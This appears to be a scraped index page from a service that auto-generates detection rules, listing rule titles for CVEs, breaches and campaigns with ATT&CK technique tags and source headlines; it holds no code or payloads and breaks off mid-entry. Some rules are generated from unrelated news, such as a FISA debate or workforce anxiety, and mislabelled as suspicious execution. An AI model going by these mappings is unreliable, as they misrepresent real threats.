CVE-2025-51846: CryptPad Unbounded WebSocket Frame Flood
🌐 NVDT1499 — Impact
Auto-generated from CVE-2025-51846: CryptPad Instance Denial-of-Service via W...
CVE-2022-50993 - Weaver E-office Unauthenticated File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Weaver E-office RCE: Unauthenticated File Upload Exploit ...
🛡️ 2 more rules via /detect
CVE-2022-50992 - Weaver E-cology Arbitrary File Read via XML-RPC
🌐 NVDT1190 — Initial Access
Auto-generated from Weaver E-cology Arbitrary File Read via XML-RPC (CVE-2022...
🛡️ 2 more rules via /detect
Exploitation Attempt — PocketOS
Breach Intelvulnerability — event-type
Auto-generated from AI Agent Wipes Production Database and Backups for PocketOS
FBI Cargo Theft - BEC Targeting Logistics
Breach IntelT1566.002 — Initial Access
Auto-generated from FBI Warns of Cyber-Enabled Cargo Theft Surge, $725M Losse...
🛡️ 2 more rules via /detect
Suspicious PyPI Package Installation - PyTorch Lightning Compromise
Breach IntelT1190 — Initial Access
Auto-generated from PyTorch Lightning Compromised in PyPI Supply Chain Attack
🛡️ 2 more rules via /detect
Free Tier - ANTS Data Breach - Suspicious Process Execution
Breach IntelT1059.003 — Execution
Auto-generated from France Investigates Teen Over National ID Agency Data Breach
🛡️ 2 more rules via /detect
MOVEit Automation Privilege Escalation via Specific API Endpoint - CVE-2026-5174
🌐 NVDT1068 — Privilege Escalation
Auto-generated from MOVEit Automation Privilege Escalation (CVE-2026-5174)
🛡️ 2 more rules via /detect
CVE-2026-4670 MOVEit Automation Authentication Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from MOVEit Automation Critical Authentication Bypass (CVE-202...
🛡️ 2 more rules via /detect
CVE-2026-2892 - Otter Blocks Purchase Bypass via Unsigned Cookie
🌐 NVDT1190 — Initial Access
Auto-generated from Otter Blocks WordPress Plugin Vulnerable to Purchase Bypa...
🛡️ 1 more rules via /detect
Possible Health Data Exfiltration via Unusual DNS Queries
Breach IntelT1071.004 — Exfiltration
Auto-generated from Moldova Health Insurance Agency Reports Possible Data Lea...
🛡️ 2 more rules via /detect
CVE-2026-7399 - MeWare PDKS Authorization Bypass - Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from MeWare PDKS Authorization Bypass (CVE-2026-7399) Exposes ...
🛡️ 1 more rules via /detect
JetBrains IntelliJ IDEA Arbitrary File Read via Built-in Web Server — CVE-2026-41882
🌐 NVDT1190 — Initial Access
Auto-generated from JetBrains IntelliJ IDEA Vulnerability Allows Arbitrary Fi...
🛡️ 1 more rules via /detect
EnOcean SmartServer Remote Code Execution Attempt
Breach IntelT1190 — Initial Access
Auto-generated from EnOcean SmartServer Vulnerabilities Enable Building Syste...
🛡️ 2 more rules via /detect
EtherRAT Campaign GitHub Repository Download
Breach IntelT1190 — Initial Access
Auto-generated from EtherRAT Campaign Spoofs Admin Tools via GitHub Facades
🛡️ 2 more rules via /detect
cPanel Authentication Bypass - Admin Access Attempt
Breach IntelT1190 — Initial Access
Auto-generated from cPanel & WHM Zero-Day Exploited for Months, Granting Admi...
🛡️ 2 more rules via /detect
CVE-2026-42800: ASR Lapwing_Linux Null Pointer Dereference via SIP URI Manipulation
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42800: High-Severity Null Pointer Dereference in...
🛡️ 2 more rules via /detect
Linux Copy Fail LPE - Target File Write
Breach IntelT1548.002 — Privilege Escalation
Auto-generated from Linux 'Copy Fail' Vulnerability Grants Root Access
🛡️ 2 more rules via /detect
CVE-2026-42799: ASR Kestrel Out-of-Bounds Read in NrPwrCtrl.C
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42799: ASR Kestrel Out-of-Bounds Read Flaw Expos...
🛡️ 2 more rules via /detect
ColorOS Assistant Unauthenticated Path Traversal - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from ColorOS Assistant CVE-2026-22070: Unauthenticated Path Tr...
🛡️ 2 more rules via /detect
Inc Ransomware Execution via Suspicious PowerShell
Breach IntelT1059.001 — Execution
Auto-generated from Sandhills Medical Discloses Inc Ransomware Breach Affecti...
🛡️ 3 more rules via /detect
Wireshark TLS Dissector Heap Overflow Attempt (CVE-2026-5402) - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Wireshark TLS Dissector Heap Overflow (CVE-2026-5402) Ena...
🛡️ 2 more rules via /detect
CVE-2025-13030: django-mdeditor Unauthenticated Image Upload for Code Execution
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-13030: django-mdeditor Vulnerable to Code Execut...
🛡️ 2 more rules via /detect
Iranian Group Data Exfiltration Claim - IMCO Industries
Breach IntelT1020 — Exfiltration
Auto-generated from Iranian Group Claims 30TB Breach of Israeli Company IMCO ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7470
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7470: Tenda 4G300 Router Vulnerable to Remote St...
🛡️ 2 more rules via /detect
CVE-2026-7468: Access to Druid Index HTML in smart-admin
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7468: Improper Access Control Flaw in 1024-lab s...
🛡️ 1 more rules via /detect
CVE-2026-7446: VetCoders mcp-server-semgrep OS Command Injection via ID parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7446: VetCoders mcp-server-semgrep OS Command In...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7420
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7420: UTT HiPER 1250GW Buffer Overflow Exploitab...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7419
🌐 NVDT1190 — Initial Access
Auto-generated from UTT HiPER 1250GW CVE-2026-7419: Remote Buffer Overflow Ex...
🛡️ 2 more rules via /detect
SAP npm Packages Compromised - Suspicious npm install
Breach IntelT1059.003 — Execution
Auto-generated from SAP npm Packages Compromised in Supply-Chain Attack
🛡️ 2 more rules via /detect
Suspicious Process Execution Related to FISA Section 702 Debate
Breach IntelT1059.003 — Execution
Auto-generated from House Renews Section 702 FISA, Senate Fate Uncertain
🛡️ 2 more rules via /detect
CVE-2026-7418 - UTT HiPER 1250GW NTP Profile Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from UTT HiPER 1250GW: High-Severity Buffer Overflow (CVE-2026...
🛡️ 1 more rules via /detect
CVE-2026-7417 - Algovate xhs-mcp SSRF via media_paths
🌐 NVDT1190 — Initial Access
Auto-generated from Algovate xhs-mcp SSRF Vulnerability (CVE-2026-7417) Publi...
🛡️ 2 more rules via /detect
CVE-2026-7416 - PolarVista xcode-mcp-server OS Command Injection via build_project/run_tests
🌐 NVDT1190 — Initial Access
Auto-generated from PolarVista xcode-mcp-server Suffers High-Severity OS Comm...
🛡️ 1 more rules via /detect
CVE-2026-7404: mcpo-simple-server Path Traversal in delete_shared_prompt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7404: mcpo-simple-server Vulnerability Exposes D...
🛡️ 2 more rules via /detect
Dubai Scam Center - Malicious Cryptocurrency Investment Site Access
Breach IntelT1566.002 — Initial Access
Auto-generated from US, China Partner on Dubai Scam Center Takedown
🛡️ 2 more rules via /detect
Exploitation Attempt — CVE-2026-7426
🌐 NVDvulnerability — event-type
Auto-generated from CVE-2026-7426: FreeRTOS-Plus-TCP IPv6 RA Heap Overflow
CVE-2026-34965: Cockpit CMS PHP Code Injection via save_collection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-34965: Cockpit CMS RCE via PHP Code Injection
🛡️ 2 more rules via /detect
CVE-2018-25318: Tenda Router DNS Hijacking Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2018-25318: Tenda Router Vulnerability Allows DNS Hij...
🛡️ 1 more rules via /detect
Tenda Router Unauthenticated DNS Hijacking Attempt (CVE-2018-25317)
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda Routers: CVE-2018-25317 Allows Unauthenticated DNS ...
🛡️ 1 more rules via /detect
CVE-2018-25316: Tenda W308R DNS Hijacking via Crafted Cookie
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2018-25316: Tenda Router Flaw Exposes DNS Hijacking Risk
🛡️ 1 more rules via /detect
CVE-2018-25315: Alloksoft Video Joiner License Name Buffer Overflow
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2018-25315: Alloksoft Video Joiner Buffer Overflow Al...
🛡️ 2 more rules via /detect
CVE-2018-25314: Alloksoft WMV Converter License Name Buffer Overflow
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2018-25314: Alloksoft WMV Converter Buffer Overflow A...
🛡️ 1 more rules via /detect
BuddyPress Xprofile Custom Fields Arbitrary File Deletion - CVE-2018-25308
🌐 NVDT1190 — Initial Access
Auto-generated from BuddyPress RCE: Authenticated Users Can Delete Arbitrary ...
🛡️ 1 more rules via /detect
CVE-2018-25307 - SysGauge Pro Local Code Execution via Crafted Unlock Key
🌐 NVDT1068 — Privilege Escalation
Auto-generated from SysGauge Pro 4.6.12 Vulnerability Allows Local Code Execu...
🛡️ 2 more rules via /detect
Free Download Manager Local Buffer Overflow via Malicious URL Import - CVE-2018-25304
🌐 NVDT1190 — Initial Access
Auto-generated from Free Download Manager CVE-2018-25304: Local Buffer Overfl...
🛡️ 1 more rules via /detect
CVE-2018-25301 - Easy MPEG to DVD Burner Local Buffer Overflow via Malicious Username
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2018-25301: Easy MPEG to DVD Burner Local Buffer Over...
🛡️ 2 more rules via /detect
CVE-2018-25300: XATABoost CMS Unauthenticated SQL Injection via id parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2018-25300: XATABoost CMS SQL Injection Allows Unauth...
🛡️ 1 more rules via /detect
CVE-2018-25299: Prime95 Local Buffer Overflow via Proxy Hostname
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2018-25299: Prime95 Local Buffer Overflow Allows Arbi...
🛡️ 1 more rules via /detect
Wiz AI Discovered GitHub Vulnerability - Potential Exploit
Breach IntelT1190 — Initial Access
Auto-generated from AI Reverse Engineering Unearths High-Severity GitHub Bug
🛡️ 2 more rules via /detect
OpenEMR SQL Injection leading to RCE
Breach IntelT1190 — Initial Access
Auto-generated from AI Spots 38 Critical Flaws in OpenEMR Healthcare Platform
🛡️ 2 more rules via /detect
CVE-2026-7466 AgentFlow Pipeline Path Traversal RCE
🌐 NVDT1505.003 — Persistence
Auto-generated from AgentFlow RCE Vulnerability (CVE-2026-7466) Allows Local ...
🛡️ 2 more rules via /detect
CVE-2026-7424: FreeRTOS-Plus-TCP DHCPv6 Integer Underflow DoS
🌐 NVDT1608.001 — Initial Access
Auto-generated from CVE-2026-7424: FreeRTOS-Plus-TCP DHCPv6 Vulnerability Lea...
🛡️ 1 more rules via /detect
CVE-2026-7398: BioinfoMCP Path Traversal via Upload Name Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7398: Path Traversal in BioinfoMCP Upload Endpoint
🛡️ 2 more rules via /detect
CVE-2026-30893: Wazuh Path Traversal to Arbitrary File Write
🌐 NVDT1505.003 — Persistence
Auto-generated from Wazuh CVE-2026-30893: Critical Path Traversal to RCE
🛡️ 2 more rules via /detect
IdentityIQ Authenticated Role Definition Edit - CVE-2026-5712
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from IdentityIQ CVE-2026-5712: Authenticated Users Can Edit Roles
🛡️ 1 more rules via /detect
Supply Chain Compromise: SAP npm Packages - Mini Shai-Hulud
Breach IntelT1071.004 — Command and Control
Auto-generated from SAP npm Packages Compromised by "Mini Shai-Hulud" Credent...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7386
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7386: fatbobman mail-mcp-bridge Path Traversal V...
🛡️ 2 more rules via /detect
CVE-2026-5166: Path Traversal in Pardus Software Center
🌐 NVDT1083 — Discovery
Auto-generated from CVE-2026-5166: Critical Path Traversal in TUBITAK Pardus ...
🛡️ 2 more rules via /detect
CVE-2026-42198 - pgjdbc SCRAM-SHA-256 CPU Exhaustion
🌐 NVDT1499 — Impact
Auto-generated from pgjdbc Client-Side DoS: Malicious Servers Can Exhaust CPU...
🛡️ 1 more rules via /detect
CVE-2026-41940 cPanel & WHM Authentication Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from cPanel & WHM Critical Authentication Bypass (CVE-2026-41940)
🛡️ 1 more rules via /detect
cPanel/WHM Auth Bypass Attempt
Breach IntelT1190 — Initial Access
Auto-generated from cPanel, WHM Emergency Patch Fixes Critical Auth Bypass
🛡️ 2 more rules via /detect
Vect 2.0 Ransomware - Destructive Wiper Behavior
Breach IntelT1485 — Impact
Auto-generated from Vect 2.0 Ransomware Acts as Wiper Due to Design Error
🛡️ 2 more rules via /detect
CVE-2026-5161: Pardus About Symlink Attack Attempt
🌐 NVDT1608.001 — Initial Access
Auto-generated from CVE-2026-5161: Pardus About Suffers High-Severity Symlink...
🛡️ 1 more rules via /detect
CVE-2026-5141: Pardus Software Center Privileged Process Hijacking Attempt
🌐 NVDT1548 — Privilege Escalation
Auto-generated from CVE-2026-5141: Pardus Software Center Vulnerability Allow...
🛡️ 1 more rules via /detect
CVE-2026-41952 - Acronis Privilege Escalation via Improper Input Validation
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Acronis DLP and Cyber Protect Agent Vulnerable to Privile...
🛡️ 2 more rules via /detect
CVE-2026-41220 - Acronis Privilege Escalation via Improper Input Validation
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Acronis DLP, Cyber Protect Agent Vulnerable to Local Priv...
🛡️ 2 more rules via /detect
DPRK Supply Chain Compromise - Malicious npm Package Installation
Breach IntelT1190 — Initial Access
Auto-generated from DPRK Uses AI-Inserted npm Malware, Targeting Developers
🛡️ 2 more rules via /detect
Traffic to Compromised Vendor — Vercel
Breach Intelsupply-chain — event-type
Auto-generated from Vercel Breach Highlights OAuth App Risks and Shadow AI Th...
🛡️ 1 more rules via /detect
GitHub RCE CVE-2026-3854 - Potential Exploit Attempt
Breach IntelT1190 — Initial Access
Auto-generated from GitHub RCE Flaw Could Have Exposed Millions of Private Re...
🛡️ 2 more rules via /detect
Windows Zero-Day Exploitation - Potential Initial Access
Breach IntelT1190 — Initial Access
Auto-generated from CISA Mandates Urgent Patching for Windows Zero-Day Exploi...
🛡️ 2 more rules via /detect
cPanel Authentication Bypass Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Critical cPanel Authentication Flaw Exposes Servers
🛡️ 2 more rules via /detect
CVE-2026-42377 - SureForms Pro Unauthorized Access Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from SureForms Pro Vulnerability CVE-2026-42377 Exposes Access...
🛡️ 1 more rules via /detect
Vect Ransomware - File Corruption Indicator
Breach IntelT1486 — Impact
Auto-generated from Vect Ransomware: Bug Turns Encryption into Irreversible D...
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-35155
🌐 NVDT1078.004 — Initial Access
Auto-generated from Dell iDRAC10 Vulnerability: Low-Privilege Race Condition ...
🛡️ 1 more rules via /detect
CVE-2026-42615 - CyberChef XSS via Show Base64 Offsets
🌐 NVDT1190 — Initial Access
Auto-generated from GCHQ CyberChef XSS Vulnerability (CVE-2026-42615) Identified
🛡️ 1 more rules via /detect
CVE-2026-42167: ProFTPD mod_sql RCE via Log Expansion - User Input
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42167: ProFTPD mod_sql RCE Via Log Expansion
🛡️ 1 more rules via /detect
CVE-2026-7319: Path Traversal in elinsky execution-system-mcp add_action Tool
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7319: Path Traversal in elinsky execution-system...
🛡️ 2 more rules via /detect
CVE-2026-7316: Aider-mcp Command Injection via working_dir/editable_files
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-7316: Aider-mcp Command Injection Exposes AI Dev...
🛡️ 2 more rules via /detect
CVE-2026-7315: eiceblue spire-pdf-mcp-server Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7315: eiceblue spire-pdf-mcp-server Path Travers...
🛡️ 2 more rules via /detect
CVE-2026-7314: eiceblue spire-doc-mcp-server Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7314: eiceblue spire-doc-mcp-server Path Travers...
🛡️ 2 more rules via /detect
CVE-2026-41649 - Outline Insecure Direct Object Reference for Document Access
🌐 NVDT1190 — Initial Access
Auto-generated from Outline Insecure Direct Object Reference (CVE-2026-41649)...
🛡️ 2 more rules via /detect
NGA AI Workforce Anxiety - Suspicious Process Execution
Breach IntelT1059.003 — Execution
Auto-generated from NGA Grapples with AI Workforce Overhaul and Job Anxiety
🛡️ 2 more rules via /detect
LiteLLM Pre-Auth SQLi - Suspicious SQL Query in URI
Breach IntelT1190 — Initial Access
Auto-generated from LiteLLM Pre-Auth SQLi Actively Exploited: CVE-2026-42208
🛡️ 2 more rules via /detect
CVE-2026-42431: OpenClaw node.invoke Browser Profile Mutation
🌐 NVDT1071.001 — Command and Control
Auto-generated from CVE-2026-42431: OpenClaw Vulnerability Allows Persistent ...
🛡️ 1 more rules via /detect
CVE-2026-42426: OpenClaw Node Pairing Bypass via Improper Authorization
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw CVE-2026-42426: Improper Authorization Allows No...
🛡️ 1 more rules via /detect
CVE-2026-42422: OpenClaw Unapproved Role Minting via device.token.rotate
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from OpenClaw CVE-2026-42422: Role Bypass Allows Unapproved To...
🛡️ 2 more rules via /detect
CVE-2026-41914 - OpenClaw QQ Bot SSRF Media Download
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw QQ Bot SSRF Vulnerability Bypasses Protections (...
🛡️ 2 more rules via /detect
CVE-2026-41404 - OpenClaw Operator Admin Privilege Escalation via Incomplete Scope Clearing
🌐 NVDT1548.002 — Privilege Escalation
Auto-generated from OpenClaw Privilege Escalation via Incomplete Scope Cleari...
🛡️ 1 more rules via /detect
CVE-2026-41394: OpenClaw Unauthenticated Operator Write Scope Access
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw CVE-2026-41394: Authentication Bypass Grants Ope...
🛡️ 1 more rules via /detect
OpenClaw Package Manager Override Attempt - CVE-2026-41387
🌐 NVDT1505.003 — Defense Evasion
Auto-generated from OpenClaw Incomplete Host Environment Sanitization Allows ...
🛡️ 2 more rules via /detect
OpenClaw Privilege Escalation via Unbound Bootstrap Setup - CVE-2026-41386
🌐 NVDT1068 — Privilege Escalation
Auto-generated from OpenClaw Privilege Escalation: Critical Flaw in Device Pa...
🛡️ 2 more rules via /detect
CVE-2026-41384 - OpenClaw CLI Environment Variable Injection
🌐 NVDT1574.002 — Execution
Auto-generated from OpenClaw CLI Vulnerability Allows Code Execution via Envi...
🛡️ 2 more rules via /detect
CVE-2026-41383: OpenClaw Mirror Mode Arbitrary Directory Deletion
🌐 NVDT1070.004 — Defense Evasion
Auto-generated from CVE-2026-41383: OpenClaw Arbitrary Directory Deletion Fla...
🛡️ 2 more rules via /detect
CVE-2026-41378 - OpenClaw Unrestricted Agent Request Dispatch
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from OpenClaw Privilege Escalation (CVE-2026-41378) Allows RCE...
🛡️ 2 more rules via /detect
CVE-2026-3893: Unauthenticated Access to Carlson VASCO-B GNSS Receiver Configuration
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-3893: Carlson VASCO-B GNSS Receiver Lacks Authen...
🛡️ 2 more rules via /detect
CVE-2026-24222 - NVIDIA NeMoClaw Host Environment Variable Exfiltration via Prompt Injection
🌐 NVDT1039 — Discovery
Auto-generated from NVIDIA NeMoClaw Vulnerability Exposes Host Environment Va...
🛡️ 2 more rules via /detect
CVE-2026-24186: NVIDIA FLARE SDK Untrusted Deserialization RCE Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA FLARE SDK Vulnerability: Untrusted Deserialization...
🛡️ 2 more rules via /detect
CVE-2026-24178 - NVFlare Dashboard Auth Bypass via User-Controlled Key
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA NVFlare Dashboard: Critical Auth Bypass Puts Syste...
🛡️ 2 more rules via /detect
GitHub RCE via CVE-2026-3854 Exploit Attempt
Breach IntelT1190 — Initial Access
Auto-generated from GitHub RCE Vulnerability Exposes Millions of Repositories
🛡️ 2 more rules via /detect
Ynet Population Authority Project Data Exposure
Breach IntelT1190 — Initial Access
Auto-generated from Ynet, Population Authority Project Pulled Over Data Expos...
🛡️ 2 more rules via /detect
Suspicious Process Creation Targeting Election Infrastructure
Breach IntelT1059.003 — Execution
Auto-generated from Cyber Command Warns Foreign Adversaries Targeting Midterm...
🛡️ 2 more rules via /detect
ShinyHunters Data Exfiltration from Anodot Integration
Breach IntelT1041 — Exfiltration
Auto-generated from Vimeo Blames Anodot Breach for User Data Theft by ShinyHu...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7321
🌐 NVDT1190 — Initial Access
Auto-generated from Firefox ESR Sandbox Escape: Critical CVE-2026-7321 Demand...
🛡️ 2 more rules via /detect
D-Link DIR-825M submit-url Buffer Overflow Attempt (CVE-2026-7289)
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DIR-825M Buffer Overflow (CVE-2026-7289) Exposes R...
🛡️ 1 more rules via /detect
CVE-2026-27760 - OpenCATS Installer PHP Code Injection
🌐 NVDT1190 — Initial Access
Auto-generated from OpenCATS Installer Vulnerability Allows Unauthenticated P...
🛡️ 1 more rules via /detect
Suspicious Roblox Account Takeover Attempt
Breach IntelT1110 — Credential Access
Auto-generated from Ukraine Police Arrest Hackers Targeting Thousands of Robl...
🛡️ 2 more rules via /detect
CVE-2026-5944: Unauthenticated Access to Nutanix Prism Central API via Cisco Intersight Connector
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-5944: Cisco Intersight Connector Exposes Nutanix...
🛡️ 2 more rules via /detect
AI Agent Text File to Code Execution
Breach IntelT1190 — Initial Access
Auto-generated from AI Agents Claude, Cursor, Codex Weaponize Text Files
🛡️ 2 more rules via /detect
Hugging Face LeRobot Unauthenticated RCE via Deserialization
Breach IntelT1190 — Initial Access
Auto-generated from Hugging Face LeRobot RCE: Unauthenticated Deserialization...
🛡️ 2 more rules via /detect
AVACAST DLL Hijacking - Malicious DLL Load - CVE-2026-7279
🌐 NVDT1574.001 — Privilege Escalation
Auto-generated from AVACAST DLL Hijacking (CVE-2026-7279) Allows System Code ...
🛡️ 2 more rules via /detect
CVE-2026-7248 - D-Link DI-8100 tgfile.htm Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DI-8100 Critical Buffer Overflow Vulnerability (CV...
🛡️ 1 more rules via /detect
D-Link DI-8100 file_exten.asp Buffer Overflow - CVE-2026-7247
🌐 NVDT1190 — Initial Access
Auto-generated from D-Link DI-8100 Buffer Overflow: CVE-2026-7247 Exposes Rem...
🛡️ 1 more rules via /detect
CVE-2026-7244: Totolink Router CGI Handler Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7244: Critical Command Injection Flaw in Totolin...
🛡️ 1 more rules via /detect
CVE-2026-7243 Totolink A8000RU Command Injection via setRadvdCfg
🌐 NVDT1059.004 — Execution
Auto-generated from Totolink RCE: CVE-2026-7243 Exposes Routers to Critical C...
🛡️ 2 more rules via /detect
CVE-2026-7242: Totolink A8000RU Command Injection via setOpenVpnClientCfg
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7242: Critical Command Injection in Totolink A80...
🛡️ 2 more rules via /detect
CVE-2026-7241 - Totolink A8000RU OS Command Injection via setWiFiBasicCfg
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical OS Command Injection (CVE-2026-...
🛡️ 2 more rules via /detect
Spring AI CosmosDBVectorStore SQL Injection Attempt - CVE-2026-40978
🌐 NVDT1190 — Initial Access
Auto-generated from Spring AI CosmosDBVectorStore Vulnerable to SQL Injection...
🛡️ 2 more rules via /detect
Robinhood Registration Form HTML Injection Phishing
Breach IntelT1190 — Initial Access
Auto-generated from Robinhood Registration Form Abused for Official-Looking P...
🛡️ 2 more rules via /detect
CVE-2026-7240 - Totolink A8000RU OS Command Injection via setVpnAccountCfg
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical OS Command Injection (CVE-2026-...
🛡️ 2 more rules via /detect
CVE-2026-7237: AgiFlow Path Traversal via file_path parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7237: AgiFlow Path Traversal Puts Files at Risk
🛡️ 2 more rules via /detect
CVE-2026-7234: BrowserOperator Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7234: Path Traversal Flaw in BrowserOperator Cor...
🛡️ 2 more rules via /detect
Spring AI Query Alteration Attempt - CVE-2026-40967
🌐 NVDT1190 — Initial Access
Auto-generated from Spring AI Vulnerability (CVE-2026-40967) Allows Query Alt...
🛡️ 2 more rules via /detect
Indirect Prompt Injection via Malicious Website Content
Breach IntelT1190 — Initial Access
Auto-generated from Google Reports 32% Surge in Prompt Injection Attacks
🛡️ 2 more rules via /detect
Microsoft Entra Agent Administrator Role Abuse
Breach IntelT1078.004 — Privilege Escalation
Auto-generated from Microsoft Entra ID Agent Role Flaw Enabled Service Princi...
🛡️ 2 more rules via /detect
ShinyHunters Data Exfiltration via Web Server
Breach IntelT1041 — Exfiltration
Auto-generated from Medtronic Confirms Breach After ShinyHunters Data Leak Th...
🛡️ 2 more rules via /detect
CVE-2026-7228: SourceCodester Pizzafy SQL Injection in get_cart_count
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7228: SourceCodester Pizzafy SQL Injection
🛡️ 2 more rules via /detect
CVE-2026-7227: Pizzafy SQL Injection Attempt on Login
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7227: SourceCodester Pizzafy Ecommerce System SQ...
🛡️ 2 more rules via /detect
CVE-2026-7226: SQL Injection in Pizzafy Ecommerce login2
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7226: SQL Injection in SourceCodester Pizzafy Ec...
🛡️ 1 more rules via /detect
CVE-2026-7225: SourceCodester Pizzafy SQL Injection via delete_menu
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7225: SourceCodester Pizzafy SQL Injection Vulne...
🛡️ 2 more rules via /detect
CVE-2026-7224: SQL Injection in Pizzafy delete_cart Function
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7224: SQL Injection in SourceCodester Pizzafy Ec...
🛡️ 2 more rules via /detect
Windows Shell Spoofing Vulnerability CVE-2026-32202 Exploitation
Breach IntelT1190 — Initial Access
Auto-generated from Microsoft Confirms Active Exploitation of Windows Shell C...
🛡️ 1 more rules via /detect
ShinyHunters Vimeo Data Breach - Anodot Compromise Indicator
Breach IntelT1595.002 — Reconnaissance
Auto-generated from ShinyHunters Claims Vimeo Breach, Citing Anodot Compromise
🛡️ 2 more rules via /detect
HAFNIUM Exchange Server Exploitation - Specific CVE
Breach IntelT1190 — Initial Access
Auto-generated from HAFNIUM Hacker Extradited to US for Microsoft Exchange At...
🛡️ 2 more rules via /detect
CVE-2026-7223: BigSweetPotatoStudio HyperChat SSRF via AI Proxy Middleware
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7223: BigSweetPotatoStudio HyperChat SSRF Vulner...
🛡️ 2 more rules via /detect
CVE-2026-7221 - TencentCloudBase CloudBase-MCP openUrl SSRF
🌐 NVDT1190 — Initial Access
Auto-generated from TencentCloudBase CloudBase-MCP SSRF Vulnerability (CVE-20...
🛡️ 2 more rules via /detect
CVE-2026-7220: FastlyMCP Command Injection via 'command' argument
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-7220: FastlyMCP Command Injection Exposes Infras...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7219
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink N300RT: High-Severity Buffer Overflow Vulnerabil...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7218
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7218: Totolink N300RT Buffer Overflow Exploited ...
🛡️ 2 more rules via /detect
CVE-2026-7216: donchelo processing-claude-mcp-bridge Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7216: donchelo processing-claude-mcp-bridge Path...
🛡️ 2 more rules via /detect
CVE-2026-7215 - egtai gmx-vmd-mcp Remote Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from egtai gmx-vmd-mcp Vulnerability: Remote Command Injection...
🛡️ 1 more rules via /detect
CVE-2026-1460: Zyxel Router Admin Command Injection via DomainName
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-1460: Zyxel Routers Vulnerable to Admin Command ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7214
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7214: eghuzefa engineer-your-data Path Traversal...
🛡️ 3 more rules via /detect
CVE-2026-7213 - MLOps_MCP Path Traversal via save_file Tool
🌐 NVDT1190 — Initial Access
Auto-generated from ef10007 MLOps_MCP Path Traversal (CVE-2026-7213) Publicly...
🛡️ 2 more rules via /detect
CVE-2026-7212: notes-mcp Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7212: edvardlindelof notes-mcp Path Traversal Vu...
🛡️ 2 more rules via /detect
CVE-2026-7211: dvladimirov MCP Git Search API Command Injection
